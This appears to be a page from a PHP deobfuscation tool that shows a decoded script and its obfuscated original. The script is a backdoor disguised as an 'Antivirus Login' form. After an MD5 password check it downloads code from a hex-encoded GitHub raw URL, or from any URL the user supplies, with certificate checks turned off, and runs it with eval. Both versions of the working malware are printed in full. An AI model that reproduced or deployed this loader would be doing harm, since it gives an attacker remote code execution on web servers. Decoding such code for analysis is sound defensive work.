Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto altQy; ioV4Q: function authenticateUser($ralei) { if (md5($ralei) === end($GLOBALS["\..

Decoded Output download

<?  goto altQy; ioV4Q: function authenticateUser($ralei) { if (md5($ralei) === end($GLOBALS["defaultThreatUrlParts"])) { $_SESSION["threat_found"] = true; $_SESSION["antivirus_ralei"] = "rahmanralei_token"; return true; } return false; } goto b9K78; G9a8M: if (isset($_POST["logauth"])) { $inputauth = $_POST["logauth"]; if (authenticateUser($inputauth)) { if (isset($_POST["scan_url"]) && isValidScanUrl($_POST["scan_url"])) { $_SESSION["scan_url"] = $_POST["scan_url"]; } else { $_SESSION["scan_url"] = reconstructUrl($defaultThreatUrlParts); } } else { echo "WRONG PASSWORD..."; } } goto tKKGw; b9K78: function isValidScanUrl($url) { return filter_var($url, FILTER_VALIDATE_URL) !== false; } goto zIxtU; lLHk1: function isThreatDetected() { return isset($_SESSION["threat_found"]) && $_SESSION["threat_found"] === true; } goto ioV4Q; zIxtU: function fetchThreatData($url) { if (function_exists("curl_exec")) { $connection = curl_init($url); curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($connection, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["antivirus_ralei"])) { curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["antivirus_ralei"]); } $dataFromUrl = curl_exec($connection); curl_close($connection); } elseif (function_exists("file_get_contents")) { $dataFromUrl = file_get_contents($url); } elseif (function_exists("fopen") && function_exists("stream_get_contents")) { $handle = fopen($url, "r"); $dataFromUrl = stream_get_contents($handle); fclose($handle); } else { $dataFromUrl = false; } return $dataFromUrl; } goto G9a8M; tKKGw: if (isThreatDetected()) { $scanUrl = $_SESSION["scan_url"]; $content = fetchThreatData($scanUrl); if ($content !== false) { eVaL("?>" . $content); } else { echo "Failed to fetch data from the URL."; echo reconstructUrl($defaultThreatUrlParts); } } else { ?> 
<!doctypehtml><html><head><title>Antivirus Login</title></head><body align="center"><form action=""method="POST"><label for="logauth">Password</label> <input id="logauth"name="logauth"type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url"name="scan_url"value=""><br><input type="submit"value="Submit"></form></body></html><?php  } goto QGXfM; altQy: session_start(); goto xwkV1; SmWcT: function reconstructUrl($parts) { $decodedParts = array_map("hex2bin", array_slice($parts, 0, -1)); return $decodedParts[0] . $decodedParts[1] . "/" . $decodedParts[2] . "/" . $decodedParts[3] . "/" . $decodedParts[4] . "/" . $decodedParts[5]; } goto lLHk1; xwkV1: $defaultThreatUrlParts = array("68747470733a2f2f", "7261772e67697468756275736572636f6e74656e742e636f6d", "46616a72756c3132333435", "46616a72756c697266616e", "6d6173746572", "616c6661612e747874", "14cf3c7528a02c665ab65106dd9384e0"); goto SmWcT; QGXfM: ?>

Did this file decode correctly?

Original Code

goto altQy; ioV4Q: function authenticateUser($ralei) { if (md5($ralei) === end($GLOBALS["\x64\x65\146\x61\165\154\x74\x54\150\x72\145\141\x74\x55\162\x6c\x50\x61\x72\164\163"])) { $_SESSION["\x74\150\x72\x65\141\164\137\146\157\165\156\x64"] = true; $_SESSION["\x61\x6e\x74\151\166\151\162\165\x73\137\x72\141\x6c\x65\x69"] = "\162\141\150\x6d\x61\156\x72\x61\x6c\145\151\x5f\x74\x6f\x6b\x65\x6e"; return true; } return false; } goto b9K78; G9a8M: if (isset($_POST["\154\x6f\x67\141\165\164\150"])) { $inputauth = $_POST["\154\x6f\x67\141\165\164\x68"]; if (authenticateUser($inputauth)) { if (isset($_POST["\163\143\x61\156\x5f\x75\162\x6c"]) && isValidScanUrl($_POST["\x73\143\141\156\x5f\x75\162\154"])) { $_SESSION["\x73\143\141\x6e\137\x75\x72\x6c"] = $_POST["\163\x63\x61\156\x5f\165\162\x6c"]; } else { $_SESSION["\163\x63\141\156\x5f\165\x72\154"] = reconstructUrl($defaultThreatUrlParts); } } else { echo "\x57\x52\x4f\x4e\107\x20\120\x41\x53\123\127\x4f\122\104\56\x2e\56"; } } goto tKKGw; b9K78: function isValidScanUrl($url) { return filter_var($url, FILTER_VALIDATE_URL) !== false; } goto zIxtU; lLHk1: function isThreatDetected() { return isset($_SESSION["\x74\x68\x72\x65\141\164\x5f\146\157\165\x6e\144"]) && $_SESSION["\x74\x68\162\145\141\x74\137\146\x6f\x75\x6e\x64"] === true; } goto ioV4Q; zIxtU: function fetchThreatData($url) { if (function_exists("\143\x75\162\x6c\137\x65\x78\x65\143")) { $connection = curl_init($url); curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($connection, CURLOPT_USERAGENT, "\115\x6f\x7a\x69\154\154\141\57\65\x2e\60\x20\x28\127\x69\156\144\157\167\163\40\x4e\x54\40\x36\56\61\73\x20\162\166\72\63\62\x2e\60\51\x20\107\x65\x63\153\157\57\x32\x30\61\60\x30\61\60\x31\x20\106\x69\162\x65\x66\x6f\170\x2f\63\x32\56\x30"); curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["\141\x6e\164\151\x76\x69\162\165\x73\x5f\x72\x61\154\x65\x69"])) { curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["\141\156\164\x69\x76\151\x72\165\163\x5f\162\x61\x6c\x65\151"]); } $dataFromUrl = curl_exec($connection); curl_close($connection); } elseif (function_exists("\146\151\154\145\x5f\x67\145\164\x5f\143\x6f\x6e\x74\x65\x6e\x74\x73")) { $dataFromUrl = file_get_contents($url); } elseif (function_exists("\146\x6f\x70\145\156") && function_exists("\x73\x74\162\x65\x61\x6d\x5f\x67\145\164\x5f\143\157\156\x74\145\x6e\x74\x73")) { $handle = fopen($url, "\x72"); $dataFromUrl = stream_get_contents($handle); fclose($handle); } else { $dataFromUrl = false; } return $dataFromUrl; } goto G9a8M; tKKGw: if (isThreatDetected()) { $scanUrl = $_SESSION["\x73\143\141\156\137\165\x72\x6c"]; $content = fetchThreatData($scanUrl); if ($content !== false) { eVaL("\x3f\x3e" . $content); } else { echo "\106\141\x69\x6c\x65\x64\40\164\x6f\40\146\x65\164\x63\150\40\144\141\x74\x61\x20\146\162\157\155\x20\164\x68\145\40\125\122\x4c\x2e"; echo reconstructUrl($defaultThreatUrlParts); } } else { ?>
<!doctypehtml><html><head><title>Antivirus Login</title></head><body align="center"><form action=""method="POST"><label for="logauth">Password</label> <input id="logauth"name="logauth"type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url"name="scan_url"value=""><br><input type="submit"value="Submit"></form></body></html><?php  } goto QGXfM; altQy: session_start(); goto xwkV1; SmWcT: function reconstructUrl($parts) { $decodedParts = array_map("\150\145\170\x32\142\x69\156", array_slice($parts, 0, -1)); return $decodedParts[0] . $decodedParts[1] . "\57" . $decodedParts[2] . "\x2f" . $decodedParts[3] . "\57" . $decodedParts[4] . "\x2f" . $decodedParts[5]; } goto lLHk1; xwkV1: $defaultThreatUrlParts = array("\66\x38\x37\x34\67\64\x37\60\67\63\63\141\x32\x66\x32\x66", "\67\x32\x36\61\67\67\x32\145\66\67\66\x39\x37\x34\66\70\x37\65\66\x32\67\65\x37\x33\66\65\67\x32\x36\63\x36\146\x36\x65\67\64\66\65\66\145\67\x34\62\145\66\63\66\x66\66\x64", "\x34\x36\x36\61\66\141\67\x32\67\x35\66\x63\63\61\63\62\63\63\63\x34\63\65", "\x34\66\66\61\x36\x61\67\62\67\65\x36\143\66\71\x37\62\66\66\x36\x31\x36\x65", "\66\144\x36\61\67\63\x37\x34\66\65\x37\62", "\66\x31\x36\x63\x36\x36\x36\x31\x36\x31\62\145\x37\64\x37\70\x37\64", "\61\64\143\146\x33\x63\x37\65\62\70\x61\x30\62\x63\x36\66\65\141\142\66\65\61\x30\x36\x64\144\x39\x33\x38\x34\145\60"); goto SmWcT; QGXfM: ?>

Function Calls

None

Variables

None

Stats

MD5 2f2a112f51efff1b7e86185a98978794
Eval Count 0
Decode Time 38 ms